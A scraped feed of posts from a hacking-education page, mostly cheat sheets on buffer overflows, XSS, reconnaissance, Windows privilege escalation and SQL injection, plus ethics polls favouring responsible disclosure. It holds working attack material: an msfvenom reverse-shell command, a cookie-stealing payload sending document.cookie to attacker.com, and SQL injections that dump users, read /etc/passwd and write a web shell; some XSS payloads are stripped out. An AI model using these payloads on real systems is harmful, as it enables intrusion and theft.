Beejay Computers

Beejay Computers This page is created with the intention to support the learners who are passionate about hacking and

02/05/2026

πŸ’₯ BUFFER OVERFLOW COMPLETE GUIDE

Learn to exploit memory corruption vulnerabilities:

πŸ“Œ STACK BASICS:
int main() {
char buffer[64]; // 64 bytes allocated
gets(buffer); // Vulnerable function!
return 0;
}

πŸ“Œ OVERFLOW MECHANICS:
1. Buffer overflows stack
2. Overwrites return address
3. Points to shellcode in memory

πŸ“Œ FINDING VULNERABILITY:
# Create pattern
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 100
# Send pattern to application
# Find offset with pattern_offset.rb

πŸ“Œ EXPLOIT STEPS:

1️⃣ GENERATE PATTERN:
msf-pattern_create -l 200

2️⃣ FIND OFFSET:
msf-pattern_offset -l 200 -q "AAAA..."

3️⃣ CONTROL EIP:
offset = 146
buffer = "A" * 146 + "B" * 4 + "C" * 200

4️⃣ FIND BAD CHARS:
# Remove null bytes (οΏ½)
# Test all chars -ΓΏ
# Analyze which get mangled

5️⃣ FIND JUMP ADDRESS:
# Find address pointing to NOP sled or shellcode
!mona jmp -r esp -cpb "οΏ½"
# Or use objdump to find gadgets

6️⃣ CREATE EXPLOIT:
#!/usr/bin/python3
import os
offset = 146
ret = b"\x55\x83\x04\x08" # jmp esp address
nop = b"\x90" * 20
shellcode = b"..." # Your payload

buffer = b"A" * offset + ret + nop + shellcode

πŸ“Œ GENERATE SHELLCODE:
# Using msfvenom
msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=443 -f python -b "\x00\x0a\x0d"
# Options:
# -f c, python, exe
# -b remove bad chars
# -e encoder

πŸ“Œ COMMON SHELLCODE LOCATIONS:
# NOP Sled (No Operation)
"\x90" * 20 # Slide to shellcode

# Egg Hunter
nopsled + egg + shellcode
# Use when buffer is small

πŸ“Œ PRACTICE:
β€’ vulnserver (Windows)
β€’ brainpan (Linux)
β€’ protostar (exploit-exercises)
β€’ tryhackme.com Buffer Overflow room

01/05/2026

πŸ”₯ HOT TAKE: Which programming language for hackers?

πŸ…°οΈ Python (automation, exploits)
πŸ…±οΈ Bash (quick scripts, Linux)
πŸ…² C (exploit dev, understanding)
πŸ…³ JavaScript (web hacking)

MY ANSWER: Learn ALL, master ONE!

What's your primary language? πŸ‘‡

01/05/2026

πŸ’¬ DISCUSSION: Best way to learn hacking?

I started with:
1. TryHackMe (beginner friendly)
2. PortSwigger Academy (web security)
3. HackTheBox (advanced)
4. OSCP labs (real-world)
5. YouTube tutorials

What's YOUR learning journey been?

Drop your recommendations below! πŸ‘‡

01/05/2026

πŸ” XSS (CROSS-SITE SCRIPTING) GUIDE

TYPES:

1️⃣ REFLECTED (Immediate)
URL: site.com/search?q=alert(1)
Victim clicks β†’ Script executes

2️⃣ STORED (Persistent)
Saved in database
Executes for ALL visitors
Example: Forum post, comments

3️⃣ DOM-BASED (Client-side)
Vulnerability in JavaScript
No server interaction
Example: document.write(userInput)

TESTING PAYLOADS:

Basic:
alert('XSS')

Image tag:


SVG:


Body tag:


Input tag:


IFRAME:


BYPASS FILTERS:

If blocked:




If alert blocked:
document.location='http://attacker.com/steal?c='+document.cookie


URL Encode:
%3Cscript%3Ealert(1)%3C/script%3E

HTML Encode:
<script>alert(1)</script>

IMPACT:
β€’ Session hijacking
β€’ Defacement
β€’ Phishing
β€’ Keylogging
β€’ Crypto mining

DEFENSE:
β€’ Input validation
β€’ Output encoding
β€’ Content Security Policy (CSP)
β€’ HTTPOnly cookies

PRACTICE: PortSwigger XSS labs, OWASP Juice Shop

01/05/2026

πŸ” RECONNAISSANCE MASTER GUIDE

Information gathering is 80% of hacking:

πŸ“Œ PASSIVE RECON:

# WHOIS Lookup
whois example.com
whois -h whois.verisign.io "example.com"

# DNS Enumeration
dig example.com ANY
dig @8.8.8.8 example.com
host -t mx example.com
host -t txt example.com

# Subdomain Discovery
amass enum -passive -d example.com
sublist3r -d example.com
findomain -t example.com
assetfinder example.com
subfinder -d example.com

# Virtual Host Discovery
ffuf -w wordlist -H "Host: FUZZ.example.com" example.com

πŸ“Œ ACTIVE RECON:

# Nmap Scanning
nmap -sV -sC -O -p- -T4 -oA scan.txt example.com
nmap --script vuln example.com

# Web Recon
whatweb example.com
wappalyzer example.com
builtwith example.com

# Directory Busting
gobuster dir -u https://example.com -w /usr/share/wordlists/dirb/common.txt
dirb https://example.com /usr/share/wordlists/dirb/common.txt
ffuf -w wordlist -u https://example.com/FUZZ

# Parameter Discovery
ffuf -w wordlist -u https://example.com/index.php?FUZZ=test

πŸ“Œ SUB_DOMAIN_ENUM:

# Subdomains
sublist3r -d example.com -o subs.txt
amass enum -active -d example.com
assetfinder --subs-only example.com > subs.txt

# Combine and verify
amass enum -passive -df subdomains.txt

# Port Scanning Subdomains
nmap -iL subs.txt -p 80,443,8080 -T4

πŸ“Œ GITHUB RECON:
git clone https://github.com/michenriksen/gitrob.git
gitrob --tokens-file tokens.txt --domains example.com

# GitHub Search
site:github.com "example.com" password
site:github.com "example.com" api_key
site:github.com "example.com" secret

πŸ“Œ OSINT:
β€’ hunter.io (email discovery)
β€’ shodan.io (exposed devices)
β€’ censys.io (certificates)
β€’ theHarvester -d example.com -b all

πŸ“Œ CUSTOM WORDLIST:
cewl example.com -m 5 -w wordlist.txt

30/04/2026

πŸ’¬ DISCUSSION: Ethics in Cybersecurity

You discover a critical vulnerability in a popular app:

What's your next move?

A) Public tweet for clout
B) Sell on dark web
C) Responsible disclosure
D) Bug bounty program
E) Leak to security researchers

DISCUSS: Why did you choose your answer?

30/04/2026

🎯 CTF PLAYLIST: Best Practice Platforms

BEGINNER: PicoCTF, TryHackMe, OverTheWire
INTERMEDIATE: HackTheBox, VulnHub, RootMe
ADVANCED: DEF CON CTF, Google CTF, PlaidCTF

SPECIALIZED:
β€’ Forensics: DFIR Diva
β€’ Web: PortSwigger Academy
β€’ Crypto: CryptoHack
β€’ Reversing: crackmes.one

MY PICK: Start PicoCTF β†’ HTB β†’ Real CTFs

Which platform do you use? πŸ‘‡

30/04/2026

πŸͺŸ WINDOWS PRIVILEGE ESCALATION GUIDE

Escalate from low-privilege to SYSTEM:

πŸ“Œ ENUMERATION:
whoami /all # User and privileges
whoami /priv # Enabled privileges
net user # All users
net localgroup administrators # Admins
hostname # Computer name
systeminfo # Full system info
ipconfig /all # Network config

πŸ“Œ FIND EXPLOITS:
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
# Search at:
# - exploit-db.com
# - metasploit module: post/multi/recon/local_exploit_suggester

πŸ“Œ ALWAYS INSTALLED ELEVATION ( potato Attacks):
# SeImpersonatePrivilege required
β€’ RottenPotato (older systems)
β€’ SweetPotato (newer)
β€’ JuicyPotato (Windows 7-10)
β€’ PrintSpoofer (Windows 10/Server 2019)

πŸ“Œ MISSING PATCHES:
wmic qfe list # Installed patches
# Check against known exploits:
# - MS16-032 (Secondary Logon)
# - MS17-010 (EternalBlue)
# - CVE-2019-1388 (HH)

πŸ“Œ UNQUOTED SERVICE PATHS:
wmic service get name,pathname
# If path has spaces and no quotes, exploit!

πŸ“Œ WEAK SERVICE PERMISSIONS:
accesschk.exe -uwcqv "Authenticated Users" *
# Look for SERVICE_ALL_ACCESS

πŸ“Œ REGISTRY EXPLOITS:
# Check for auto-run programs:
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
# If writable by user, inject malicious code

πŸ“Œ SCHEDULED TASKS:
schtasks /query /fo LIST /v
# Look for writable .exe/.dll/.ps1 in task

πŸ“Œ DLL HIJACKING:
1. Find application loading DLL
2. Check if DLL path is writable
3. Create malicious DLL
4. Place in application directory

πŸ“Œ AUTOMATED TOOLS:
β€’ winPEAS (github.com/carlospolop)
β€’ Seatbelt (.NET gatherer)
β€’ PowerUp.ps1 (PowerShell)
β€’ SharpUp

πŸ“Œ GETTING METERPRETER:
# Using existing session
getsystem # Try built-in
# Using RottenPotato
load incognito
execute -cH -f.exe

30/04/2026

πŸ”“ SQL INJECTION DEEP DIVE

DETECTION:
' OR 1=1--
" OR 1=1--
' OR '1'='1
') OR ('1'='1
' UNION SELECT NULL--
' ORDER BY 1--

FIND COLUMN COUNT:
' ORDER BY 1--
' ORDER BY 2--
' ORDER BY 3--
(Keep increasing until error)

EXTRACT DATABASE:
' UNION SELECT 1,database(),3--

EXTRACT TABLES:
' UNION SELECT 1,table_name,3 FROM information_schema.tables--

EXTRACT COLUMNS:
' UNION SELECT 1,column_name,3 FROM information_schema.columns WHERE table_name='users'--

DUMP DATA:
' UNION SELECT username,password,email FROM users--

READ FILES:
' UNION SELECT 1,load_file('/etc/passwd'),3--

WRITE FILES:
' UNION SELECT 1,'' INTO OUTFILE '/var/www/shell.php'--

BLIND SQLi:
' AND 1=1-- (true)
' AND 1=2-- (false)
' AND SUBSTRING(version(),1,1)='5'--

TIME-BASED:
' AND SLEEP(5)--
' AND BENCHMARK(10000000,SHA1('test'))--

TOOLS:
β€’ SQLmap (automated)
β€’ Burp Suite (manual)
β€’ sqlninja (post-exploit)

DEFENSE: Parameterized queries!

29/04/2026

πŸ€” FRIDAY DISCUSSION: Ethics in Hacking

SCENARIO: You find a critical vuln in a popular app.

What do you do?
A) Post on Twitter for clout
B) Sell on dark web
C) Responsible disclosure
D) Leak to researchers first

The RIGHT answer: C

ETHICAL GUIDELINES:
βœ… Get written permission
βœ… Stay within scope
βœ… Report responsibly
βœ… Give time to fix (90 days)

What's your disclosure experience? πŸ‘‡

Address

Tambaram

Website

Alerts

Be the first to know and let us send you an email when Beejay Computers posts news and promotions. Your email address will not be used for any other purpose, and you can unsubscribe at any time.

Shortcuts

Share

Category